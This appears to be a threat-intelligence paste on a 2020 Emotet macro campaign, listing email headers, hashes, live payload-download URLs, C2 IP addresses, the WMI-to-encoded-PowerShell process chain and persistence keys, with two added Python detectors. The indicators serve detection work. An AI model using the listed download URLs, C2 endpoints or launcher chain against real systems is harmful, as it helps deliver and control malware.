VRad

#emotet_221020

Oct 23rd, 2020 (edited)
#IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell

https://pastebin.com/cNb8XhX1

previous_contact:
https://pastebin.com/1XfkVE5e
https://pastebin.com/F520pqQW

FAQ:

attack_vector
--------------
email attachment .doc > macro > WMI (Win32_Process) > powershell -enc > GET from one of 8 URLs (tried in turn) > \Users\%name%\*.exe > copied to C:\Users\%name%\AppData\Local\*\*.exe

email_headers
--------------
Received: from ns.shimizuya.co.jp (ns.shimizuya.co.jp [210.143.104.170])
Received: from [197.221.251.9] (unknown [197.221.251.9])
by ns.shimizuya.co.jp (Postfix) with ESMTPA id 13DFA63586
Date: Thu, 22 Oct 2020 14:40:57 +0200
From: "spoofed_email" <kikaku-toyopridea@shimizuya.co.jp>
To: victim@org.com
Subject: FW: Надсилання: 1_16_41124-20(09.10.20), Концепція розвитку, Пояснювальна записка, Розпорядження(проект)
(Ukrainian; in English: "FW: Sending: 1_16_41124-20(09.10.20), Development concept, Explanatory note, Directive (draft)")

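The Received chain above is the part worth a detection: the message was handed to the sender domain's own Postfix with SMTP AUTH (the "ESMTPA" keyword) from an IP with no reverse DNS ("unknown"), which is a compromised mailbox being used to send, not a forged From. SPF, DKIM and DMARC on shimizuya.co.jp will all pass, so a mail gateway has to look at the submission hop itself. The following is an added example, not part of the original paste: it parses the headers shown on this page and flags an authenticated submission to the sender's own MX from an IP outside an allowlist. The allowlist (the MX's own /24) is an assumption made for the example.

```python
import ipaddress
import re
from email.utils import parseaddr
from typing import Dict, List, Optional, Tuple

# Headers copied from the email_headers section of this page (subject omitted; the
# analysis does not use it). The folded "by ..." continuation line is kept folded.
SAMPLE_HEADERS = (
    "Received: from ns.shimizuya.co.jp (ns.shimizuya.co.jp [210.143.104.170])\n"
    "Received: from [197.221.251.9] (unknown [197.221.251.9])\n"
    "\tby ns.shimizuya.co.jp (Postfix) with ESMTPA id 13DFA63586\n"
    "Date: Thu, 22 Oct 2020 14:40:57 +0200\n"
    'From: "spoofed_email" <kikaku-toyopridea@shimizuya.co.jp>\n'
    "To: victim@org.com\n"
)

# Networks from which the sender domain is expected to submit mail. ASSUMPTION for
# this example: the MX's own /24. In production this comes from the tenant's records.
TRUSTED_SUBMISSION_NETS = [ipaddress.ip_network("210.143.104.0/24")]

# Postfix-style Received clause: from <helo> (<rdns> [<ip>]) by <host> ... with <proto>
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]+)\s+\[(?P<ip>[0-9a-fA-F.:]+)\]\)"
    r"(?:\s+by\s+(?P<by>\S+))?"
    r"(?:.*?\bwith\s+(?P<proto>[A-Za-z]+))?",
    re.S,
)


def unfold_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs with RFC 5322 folded continuation lines joined."""
    fields: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            fields.append((name.strip().lower(), value.strip()))
    return fields


def parse_received(value: str) -> Optional[Dict[str, Optional[str]]]:
    """Extract helo, rdns, ip, by and proto from one unfolded Received value."""
    m = RECEIVED_RE.search(value)
    return m.groupdict() if m else None


def flag_authenticated_external_submission(raw: str) -> List[Dict[str, str]]:
    """Flag hops where the From domain's own server accepted the message with SMTP AUTH
    (ESMTPA/ESMTPSA) from an address outside TRUSTED_SUBMISSION_NETS."""
    fields = unfold_headers(raw)
    from_value = next((v for n, v in fields if n == "from"), "")
    sender_domain = parseaddr(from_value)[1].rpartition("@")[2].lower()
    findings = []
    for name, value in fields:
        if name != "received":
            continue
        hop = parse_received(value)
        if not hop or not hop["by"] or not hop["proto"]:
            continue  # truncated or non-SMTP hop: nothing to judge
        by = hop["by"].lower()
        in_sender_domain = by == sender_domain or by.endswith("." + sender_domain)
        authenticated = hop["proto"].upper() in ("ESMTPA", "ESMTPSA")
        ip = ipaddress.ip_address(hop["ip"])
        trusted = any(ip in net for net in TRUSTED_SUBMISSION_NETS)
        if in_sender_domain and authenticated and not trusted:
            findings.append({
                "ip": str(ip),
                "rdns": hop["rdns"],
                "by": hop["by"],
                "reason": "SMTP AUTH submission to the sender's own MX from an untrusted IP: "
                          "account compromise rather than header forgery, so SPF/DKIM/DMARC "
                          "on the From domain will pass",
            })
    return findings


if __name__ == "__main__":
    for f in flag_authenticated_external_submission(SAMPLE_HEADERS):
        print(f)
```

Run against the page's headers this yields one finding for 197.221.251.9; with the submitting IP swapped for one inside the allowlisted /24 it yields none. The "unknown" rDNS is reported but not required, because a compromised account used from a residential line often does have a (generic) PTR record.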
files
--------------
SHA-256 4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80
File name PO6556850371IW.doc
File size 178.00 KB (182272 bytes)

SHA-256 125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11
File name RMActivate_isv.exe
File size 368.00 KB (376832 bytes)

activity
**************
PL_SCR (payload download URLs; the 8 locations the PowerShell stage requests)
http://launch.tactikafacewear.com/wp-content/Uk
paasologrp.com/parseopmlo/5
singohotel.com/dashboardl/Pq
mymathlabhomework.com/wp-content/Po
https://dietherbsindia.com/assets/k8oo
dev-tech.eu/demoshop/P0
mithraa.co/nMT
chess-pgn.com/win-raid/Pl6T5

C2
200.116.145.225:443
5.196.108.185:8080
167.114.153.111:8080

netwrk
--------------
launch.tactikafacewear.com GET /wp-content/Uk/ HTTP/1.1
200.116.145.225:443 POST /hCnHn8M/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
5.196.108.185:8080 POST /rWnUmnc/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
167.114.153.111:8080 POST /dQok/1r/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
167.99.105.11:8080 POST /i8Elp07/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0

comp (process > remote IP port)
--------------
powershell.exe 170.10.164.154 443
powershell.exe 3.10.134.94 80

RMActivate_isv.exe 200.116.145.225 443

RMActivate_isv.exe 5.196.108.185 8080
RMActivate_isv.exe 167.114.153.111 8080
RMActivate_isv.exe 212.42.75.240 993
RMActivate_isv.exe 167.99.105.11 8080

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

[another]

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe -ENCOD IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADUAf
C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe - moved
C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe

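Two details of the proc chain above matter for detection. First, because the macro launches PowerShell through WMI, the parent of POwersheLL.exe is wmiprvse.exe, not WINWORD.EXE, so a plain "Office spawns PowerShell" parent/child rule misses it; the Office process has to be correlated by user and time instead. Second, "-ENCOD" is an abbreviated -EncodedCommand (PowerShell accepts any unambiguous prefix), and the base64 is UTF-16LE; the logged prefix decodes to ` $jCFVPb  =[TYPe]("{2}{3}{1}{5`, i.e. a type name being reassembled with the -f format operator. The following is an added example, not code from the original paste: it replays process-creation events constructed from the proc section (PIDs, timestamps and the user field are assumptions; the two benign launches are constructed for contrast), decodes the encoded command as logged, including the truncated trailing base64 group, and alerts on the WMI-mediated chain.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    ts: int       # seconds into the trace (assumed)
    pid: int      # PIDs assumed; the page records only images and command lines
    ppid: int
    image: str
    cmdline: str
    user: str


# Copied verbatim from the page's proc section, truncated exactly as logged there.
ENCODED_PREFIX = "IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADUAf"

# Constructed events: the page's chain plus two benign PowerShell launches.
SAMPLE_EVENTS = [
    ProcEvent(0, 1204, 980, r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde', "operator"),
    ProcEvent(41, 3316, 812, r"C:\Windows\system32\wbem\wmiprvse.exe",
              r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding", r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(42, 3400, 3316, r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe -ENCOD " + ENCODED_PREFIX, "operator"),
    # benign: a management agent running an inventory script via WMI as SYSTEM
    ProcEvent(50, 3512, 3316, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\inv\inventory.ps1",
              r"NT AUTHORITY\SYSTEM"),
    # benign: an encoded one-liner ("Get-Date") with no WMI parent and no Office process nearby
    ProcEvent(900, 4100, 2200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoP -e RwBlAHQALQBEAGEAdABlAA==", "operator"),
]

# Every unambiguous prefix of -EncodedCommand (plus the common -ec) is accepted by powershell.exe.
_ENC_PARAM = "encodedcommand"
_ENC_SPELLINGS = sorted({_ENC_PARAM[:i] for i in range(1, len(_ENC_PARAM) + 1)} | {"ec"},
                        key=len, reverse=True)
ENC_RE = re.compile(r"(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_SPELLINGS), re.IGNORECASE)
PLACEHOLDER_RE = re.compile(r"\{\d+\}")
OFFICE_IMAGES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE). A trailing partial
    base64 group, as in a truncated log line, is dropped rather than failing."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 = b64[: len(b64) - len(b64) % 4]
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")


def obfuscation_indicators(ev: ProcEvent, decoded: Optional[str]) -> List[str]:
    hits = []
    name = basename(ev.image)
    if name.lower() == "powershell.exe" and name != "powershell.exe":
        hits.append("mixed-case image name %s" % name)
    if decoded is not None:
        if len(PLACEHOLDER_RE.findall(decoded)) >= 3:
            hits.append("-f format-string reassembly ({n} placeholders)")
        if re.search(r"\[type\]\s*\(", decoded, re.IGNORECASE):
            hits.append("[Type](...) type name built at runtime")
    return hits


def detect_office_wmi_powershell(events: List[ProcEvent], window: int = 300) -> List[Dict[str, object]]:
    """Alert on powershell.exe spawned by WmiPrvSE while an Office process of the same
    user started within `window` seconds before: Win32_Process.Create hides the Office
    parent, so the parent chain alone never shows WINWORD."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev.image).lower() != "powershell.exe":
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None or basename(parent.image).lower() != "wmiprvse.exe":
            continue
        office = [o for o in events if basename(o.image).upper() in OFFICE_IMAGES
                  and o.user == ev.user and 0 <= ev.ts - o.ts <= window]
        if not office:
            continue
        decoded = decode_encoded_command(ev.cmdline)
        alerts.append({"pid": ev.pid, "office_pid": office[-1].pid, "decoded": decoded,
                       "indicators": obfuscation_indicators(ev, decoded)})
    return alerts


if __name__ == "__main__":
    for a in detect_office_wmi_powershell(SAMPLE_EVENTS):
        print(a)
```

The user-plus-time correlation is deliberately loose: WMI-spawned processes run in the caller's security context but are created by the WMI provider host, so the only reliable link back to the document is the account and the timing. Tighten `window` to what Office-to-PowerShell latency looks like in your own telemetry, and add the decoded command to the alert so the analyst sees the `[TYPe]("{2}{3}...` pattern rather than a base64 blob.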
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22.10.2020 15:45
RMActivate_isv EffectDemo MFC Application
c:\users\operator\appdata\local\appmgr\rmactivate_isv.exe 23.10.2020 1:28

drop
--------------
C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe
C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe

# # #
https://www.virustotal.com/gui/file/4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80/details
https://www.virustotal.com/gui/file/125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11/details
https://analyze.intezer.com/analyses/10b857fe-3d77-4c66-a92b-46fb82549676

VR